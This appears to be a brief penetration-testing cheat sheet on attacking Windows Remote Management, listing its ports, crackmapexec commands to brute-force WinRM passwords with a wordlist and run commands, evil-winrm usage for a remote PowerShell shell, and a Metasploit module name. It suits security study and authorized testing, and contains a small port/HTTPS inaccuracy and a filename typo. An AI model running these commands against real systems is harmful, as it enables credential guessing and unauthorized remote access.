WinRM

  • Windows Remote Management

  • Happens over HTTPS

  • PORT 5985 and 5986(HTTPS)

Crackmapexec

crackmapexec <protocol> <ip>
  • Bruteforce WinRM password using wordlist

    crackmapexec winrm <ip> -u username -p /wordlist/password
  • Command execution after bruteforce

    crackmapexec winrm <ip> -u <username> -p <password> -x "command"

Evil-winrm.rb

  • Ruby script for getting a powershell prompt with winrm.

evil-winrm.eb -u <username> -p <password> -i <IP>

Metasploit

exploit/windows/winrm/winrm_script_exec

Last updated